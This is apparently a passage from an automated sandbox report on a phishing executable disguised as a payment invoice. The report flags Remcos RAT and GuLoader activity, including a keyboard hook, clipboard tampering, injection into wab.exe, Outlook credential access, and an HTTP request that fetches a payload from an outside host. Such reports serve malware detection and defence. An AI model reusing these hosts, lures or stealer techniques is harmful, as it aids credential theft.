              Source: bhv3A27.tmp.9.drString found in binary or memory: https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://use.typekit.net/ecr2zvs.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
              Source: wab.exe, 00000009.00000003.40250168695.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40249957635.00000000046B3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.40254635212.00000000046B5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251372783.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40250671986.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40249997725.00000000046B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.adobe.
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.globalsign.com/repository/0
              Source: wab.exe, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.google.com/
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://www.google.com/chrome/
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/https://
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pa
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://www.google.com/pagead/drt/ui
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/osd.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.msn.com
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.msn.com/
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=ie
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40240184394.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://www.msn.com/?ocid=iehp
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-8
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/otFl
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/o
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.msn.com/de-ch/homepage/secure/silentpassport?secure=true&lc=2055
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/https://
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/https://www.msn.com/de-c
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregula
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
              Source: unknownDNS traffic detected: queries for: gudanidevelopment.ge
              Source: global trafficHTTP traffic detected: GET /IogvoayYhe139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: gudanidevelopment.geCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Contains functionality to modify clipboard data
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,9_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,9_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00406B9A EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_00406B9A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00406C3D EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,10_2_00406C3D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,11_2_004072B5
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_0040558F

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.45052911947.0000000004C88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1392, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED

              System Summary

              barindex
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: 18001787_down_payment_invoice_90002104.exe
              Source: 18001787_down_payment_invoice_90002104.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034A5
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_00404DCC3_2_00404DCC
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_00406AF23_2_00406AF2
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_6F1D1B633_2_6F1D1B63
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_3_04C941697_3_04C94169
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_3563B5C17_2_3563B5C1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_356471947_2_35647194
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00406E8F9_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044B0409_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0043610D9_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004473109_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044A4909_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040755A9_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0043C5609_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044B6109_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044D6C09_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004476F09_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044B8709_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044081D9_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004149579_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004079EE9_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00407AEB9_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044AA809_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00412AA99_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00404B749_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00404B039_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044BBD89_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00404BE59_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00404C769_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00415CFE9_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00416D729_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00446D309_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00446D8B9_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040D04410_2_0040D044
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040503810_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004050A910_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040511A10_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004051AB10_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004382F310_2_004382F3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0043057510_2_00430575
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0043B67110_2_0043B671
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0041F6CD10_2_0041F6CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004119CF10_2_004119CF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00439B1110_2_00439B11
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00438E5410_2_00438E54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00412F6710_2_00412F67
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0043CF1810_2_0043CF18
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004050C211_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004014AB11_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040513311_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004051A411_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040124611_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040CA4611_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040523511_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004032C811_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040168911_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00402F6011_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00412968 appears 78 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00421A32 appears 43 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044407A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_0449A127 Sleep,NtProtectVirtualMemory,7_2_0449A127
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00401806 NtdllDefWindowProc_W,9_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004018C0 NtdllDefWindowProc_W,9_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004016FC NtdllDefWindowProc_A,10_2_004016FC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004017B6 NtdllDefWindowProc_A,10_2_004017B6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00402CAC NtdllDefWindowProc_A,11_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00402D66 NtdllDefWindowProc_A,11_2_00402D66
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 6%
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: 18001787_down_payment_invoice_90002104.exeStatic PE information: invalid certificate
              Source: 18001787_down_payment_invoice_90002104.exeVirustotal: Detection: 11%
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeFile read: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeJump to behavior
              Source: 18001787_down_payment_invoice_90002104.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
              Source: unknownProcess created: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ixfof
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\szlggikjo
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\utqzgbudcvrn
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ixfofJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\szlggikjoJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\utqzgbudcvrnJump to behavior
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034A5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,11_2_00410DE1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeFile created: C:\Users\user\AppData\Local\Admonishment64Jump to behavior
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeFile created: C:\Users\user\AppData\Local\Temp\nszD5CF.tmpJump to behavior
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/18@4/3
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_00402104 CoCreateInstance,3_2_00402104
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,3_2_00404850
              Source: wab.exe, wab.exe, 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 00000007.00000002.45066609211.0000000035570000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, wab.exe, 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,9_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,9_2_00413D4C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\ourvbpld-RBN2WW
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,9_2_0040B58D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: 18001787_down_payment_invoice_90002104.exeStatic file information: File size 1091672 > 1048576
              Source: 18001787_down_payment_invoice_90002104.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000007.00000002.45046073128.0000000003AF9000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.40189422367.0000000003F89000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.40188235622.0000000000690000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 18001787_down_payment_invoice_90002104.exe PID: 3312, type: MEMORYSTR
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_6F1D2FD0 push eax; ret 3_2_6F1D2FFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_35632806 push ecx; ret 7_2_35632819
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044693D push ecx; ret 9_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044DB70 push eax; ret 9_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044DB70 push eax; ret 9_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00451D54 push eax; ret 9_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00444355 push ecx; ret 10_2_00444365
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004446D0 push eax; ret 10_2_004446E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004446D0 push eax; ret 10_2_0044470C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044AC84 push eax; ret 10_2_0044AC91
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00414060 push eax; ret 11_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00414060 push eax; ret 11_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00414039 push ecx; ret 11_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004164EB push 0000006Ah; retf 11_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00416553 push 0000006Ah; retf 11_2_004165C4
